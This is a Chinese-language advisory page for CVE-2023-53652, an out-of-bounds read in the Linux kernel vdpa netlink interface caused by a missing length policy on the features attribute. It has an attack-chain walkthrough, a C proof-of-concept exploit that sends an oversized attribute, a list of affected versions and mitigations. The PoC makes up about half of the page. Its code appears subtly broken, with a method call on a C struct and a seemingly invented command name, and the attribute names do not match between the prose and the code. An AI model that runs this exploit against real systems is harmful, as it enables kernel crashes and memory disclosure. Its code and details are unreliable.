CVE-2023-53652 Linux内核vdpa模块nl策略缺失导致越界读取漏洞

漏洞信息

漏洞编号

CVE-2023-53652

漏洞类型

越界读取（Out-of-Bounds Read）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel vdpa（vhost数据通路加速）子系统

漏洞概述

CVE-2023-53652是Linux内核vdpa（vhost Data Path Acceleration）子系统中存在的一个高危安全漏洞。该漏洞源于vdpa_nl_policy结构体中缺少对features属性的nla_policy定义，导致在解析传入的netlink消息（nlmsg）时无法对nlattr进行有效的长度校验。vdpa_nl_policy结构体用于在解析传入nlmsg时验证nlattr，确保被描述的属性在进入vdpa_nl_ops中的各个处理函数之前，能够在info->attrs中产生有效的nlattr指针。由于策略中缺少对features属性的校验，攻击者可以构造恶意的netlink消息绕过长度检查，在解析后产生非法的nlattr，进而触发越界读取（OOB read），其危害模式与此前披露的CVE-2023-3773类似。攻击者利用该漏洞可能导致内核信息泄露、系统崩溃（拒绝服务）甚至权限提升。该漏洞的CVSS评分为7.8，属于高危级别，攻击者只需拥有本地低权限即可利用，无需用户交互，对系统的机密性、完整性和可用性均产生高影响。漏洞已于2025年10月7日正式披露，修复补丁已合入Linux内核稳定分支。

技术细节

从技术层面分析，该漏洞存在于Linux内核的vdpa netlink接口实现中。vdpa子系统通过netlink协议与用户空间通信，允许用户配置vhost数据通路加速设备的各项属性。在netlink消息处理流程中，内核使用vdpa_nl_policy结构体对传入的nlattr（netlink属性）进行策略验证，确保属性数据的长度和类型符合预期。具体而言，nla_policy定义了每个属性允许的最大数据长度，当netlink解析器解析消息时，会根据策略检查每个属性的实际长度是否在允许范围内。如果缺少对应的策略项，解析器将无法执行长度校验，可能导致非法长度的nlattr被传递到处理函数中。在vdpa_nl_ops的各个处理回调中，代码通常会直接读取info->attrs[VDPA_ATTR_FEATURES]指向的数据，如果该属性未经长度校验就传入，恶意用户空间程序可以构造一个带有超长features数据的netlink消息，绕过验证后在内核空间触发越界内存读取。由于netlink接口默认对所有具有相应权限的用户开放（CAP_NET_ADMIN），拥有低权限但具备网络命名空间配置能力的攻击者即可利用此漏洞。越界读取可能泄露内核栈或堆中的敏感数据，也可能因访问未映射内存导致内核panic（拒绝服务）。修复方法是在vdpa_nl_policy中为VDPA_ATTR_FEATURES添加正确的NLA_POLICY_MAX_LEN策略，限制features属性的最大长度，防止恶意数据传入。

攻击链分析

STEP 1

步骤1：获取权限

攻击者需要拥有本地系统访问权限，并具备CAP_NET_ADMIN能力（或root权限），以便能够通过netlink通用接口与vdpa子系统进行通信。

STEP 2

步骤2：构造恶意netlink消息

攻击者构造一个恶意的netlink消息，在VDPA_ATTR_FEATURES属性中填入远超预期长度（u64应为8字节）的数据，利用vdpa_nl_policy中缺少对该属性的长度校验策略。

STEP 3

步骤3：发送恶意消息

通过netlink通用接口（如AF_NETLINK, NETLINK_GENERIC）将恶意消息发送到vdpa genl family，触发VDPA_CMD_DEV_FEATURES_SET等命令的处理流程。

STEP 4

步骤4：触发越界读取

内核在处理netlink消息时，由于缺少nla_policy校验，超长数据被传递到处理函数中，导致info->attrs[VDPA_ATTR_FEATURES]指向的数据被越界读取，可能泄露内核内存中的敏感信息或导致内核panic。

STEP 5

步骤5：利用泄露信息或拒绝服务

攻击者可利用泄露的内核内存信息进行进一步的权限提升攻击，或直接利用内核崩溃实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2023-53652 - Linux kernel vdpa OOB read via missing nla_policy
// This PoC demonstrates how to trigger the vulnerability by sending a malicious
// netlink message with an oversized features attribute to the vdpa netlink interface.
// Note: Requires CAP_NET_ADMIN capability or root privileges.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/genetlink.h>

#define NETLINK_GENERIC 16
#define VDPA_GENL_NAME "vdpa"
#define VDPA_GENL_VERSION 0x1

// vdpa commands and attributes (from include/uapi/linux/vdpa.h)
enum vdpa_command {
    VDPA_CMD_UNSPEC,
    VDPA_CMD_MGMTDEV_NEW,
    VDPA_CMD_MGMTDEV_GET,
    VDPA_CMD_DEV_NEW,
    VDPA_CMD_DEV_DEL,
    VDPA_CMD_DEV_GET,
    VDPA_CMD_DEV_CONFIG_GET,
    VDPA_CMD_DEV_FEATURES_SET,
};

enum vdpa_attr {
    VDPA_ATTR_UNSPEC,
    VDPA_ATTR_MGMTDEV_BUS_NAME,       // string
    VDPA_ATTR_MGMTDEV_DEV_NAME,       // string
    VDPA_ATTR_MGMTDEV_SUPPORTED_CLASSES, // u64
    VDPA_ATTR_DEV_NAME,               // string
    VDPA_ATTR_DEV_ID,                 // u32
    VDPA_ATTR_DEV_CLASS,              // u16
    VDPA_ATTR_DEV_FEATURES,           // u64 (missing policy validation)
};

struct nl_sock {
    int fd;
    struct sockaddr_nl local;
    struct sockaddr_nl peer;
    int genl_family_id;
};

static int netlink_open(struct nl_sock *nl) {
    nl->fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
    if (nl->fd < 0) {
        perror("socket");
        return -1;
    }
    memset(&nl->local, 0, sizeof(nl->local));
    nl->local.nl_family = AF_NETLINK;
    if (bind(nl->fd, (struct sockaddr *)&nl->local, sizeof(nl->local)) < 0) {
        perror("bind");
        return -1;
    }
    return 0;
}

static int genl_resolve_family(struct nl_sock *nl, const char *family_name) {
    struct {
        struct nlmsghdr nl_hdr;
        struct genlmsghdr genl_hdr;
        struct nlattr attr;
        char name[32];
    } msg;
    struct {
        struct nlmsghdr nl_hdr;
        struct genlmsghdr genl_hdr;
        char buf[256];
    } resp;
    struct nlattr *attrs;
    int len;

    memset(&msg, 0, sizeof(msg));
    msg.nl_hdr.nlmsg_type = GENL_ID_CTRL;
    msg.nl_hdr.nlmsg_flags = NLM_F_REQUEST;
    msg.nl_hdr.nlmsg_seq = 1;
    msg.nl_hdr.nlmsg_len = NLMSG_LENGTH(sizeof(struct genlmsghdr));

    msg.genl_hdr.cmd = CTRL_CMD_GETFAMILY;
    msg.genl_hdr.version = 1;

    msg.attr.nla_type = CTRL_ATTR_FAMILY_NAME;
    msg.attr.nla_len = NLA_HDRLEN + strlen(family_name) + 1;
    strcpy((char *)msg.attr.nla_data(), family_name);
    msg.nl_hdr.nlmsg_len += NLA_ALIGN(msg.attr.nla_len);

    if (send(nl->fd, &msg, msg.nl_hdr.nlmsg_len, 0) < 0) {
        perror("send");
        return -1;
    }

    len = recv(nl->fd, &resp, sizeof(resp), 0);
    if (len < 0) {
        perror("recv");
        return -1;
    }

    attrs = (struct nlattr *)((char *)&resp + NLMSG_LENGTH(sizeof(struct genlmsghdr)));
    int attr_len = len - NLMSG_LENGTH(sizeof(struct genlmsghdr));
    while (attr_len >= NLA_HDRLEN) {
        if (attrs->nla_type == CTRL_ATTR_FAMILY_ID) {
            nl->genl_family_id = *(uint16_t *)NLA_DATA(attrs);
            return nl->genl_family_id;
        }
        attr_len -= NLA_ALIGN(attrs->nla_len);
        attrs = (struct nlattr *)((char *)attrs + NLA_ALIGN(attrs->nla_len));
    }
    return -1;
}

int main(int argc, char *argv[]) {
    struct nl_sock nl;
    char buf[4096] __attribute__((aligned(NLMSG_ALIGNTO)));
    struct nlmsghdr *nl_hdr;
    struct genlmsghdr *genl_hdr;
    struct nlattr *attr;
    int payload_len;
    int ret;

    printf("[+] CVE-2023-53652 PoC - vdpa OOB read\n");

    if (netlink_open(&nl) < 0) {
        fprintf(stderr, "[-] Failed to open netlink socket\n");
        return 1;
    }

    if (genl_resolve_family(&nl, VDPA_GENL_NAME) < 0) {
        fprintf(stderr, "[-] Failed to resolve vdpa genl family\n");
        close(nl.fd);
        return 1;
    }
    printf("[+] vdpa family ID: %d\n", nl.genl_family_id);

    // Construct malicious netlink message with oversized features attribute
    // The vulnerability is that VDPA_ATTR_FEATURES has no nla_policy,
    // so we can send an oversized payload to trigger OOB read
    memset(buf, 0, sizeof(buf));
    nl_hdr = (struct nlmsghdr *)buf;
    genl_hdr = (struct genlmsghdr *)(buf + NLMSG_HDRLEN);
    attr = (struct nlattr *)(buf + NLMSG_HDRLEN + GENL_HDRLEN);

    // Fill the attributes with an oversized payload (e.g., 4096 bytes instead of 8)
    // Expected size for u64 is 8 bytes, but we send much more
    payload_len = 4096;
    attr->nla_type = VDPA_ATTR_DEV_FEATURES;
    attr->nla_len = NLA_HDRLEN + payload_len;
    memset(NLA_DATA(attr), 0x41, payload_len); // Fill with 'A's

    nl_hdr->nlmsg_type = nl.genl_family_id;
    nl_hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
    nl_hdr->nlmsg_seq = 2;
    nl_hdr->nlmsg_len = NLMSG_LENGTH(GENL_HDRLEN) + NLA_ALIGN(attr->nla_len);
    genl_hdr->cmd = VDPA_CMD_DEV_FEATURES_SET;
    genl_hdr->version = VDPA_GENL_VERSION;

    printf("[+] Sending malicious netlink message with %d byte features payload\n", payload_len);
    ret = send(nl.fd, buf, nl_hdr->nlmsg_len, 0);
    if (ret < 0) {
        perror("[-] send");
        close(nl.fd);
        return 1;
    }

    printf("[+] Message sent. If the kernel is vulnerable, this may cause OOB read.\n");
    printf("[+] Check dmesg for kernel warnings or oops messages.\n");

    close(nl.fd);
    return 0;
}

影响范围

Linux Kernel < 6.6（包含vdpa子系统的所有受影响版本）

Linux Kernel 6.6.x（修复前版本）

Linux Kernel 6.1.x LTS（修复前版本）

Linux Kernel 5.15.x LTS（修复前版本）

Linux Kernel 5.10.x LTS（修复前版本）

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制非特权用户获取CAP_NET_ADMIN能力，例如通过移除相关用户命名空间配置；2）如果系统未使用vdpa功能，可以通过内核编译配置（CONFIG_VDPA）禁用该子系统；3）使用seccomp或AppArmor等强制访问控制机制限制进程对netlink接口的访问；4）监控内核日志（dmesg）和系统审计日志，及时发现异常的netlink通信行为。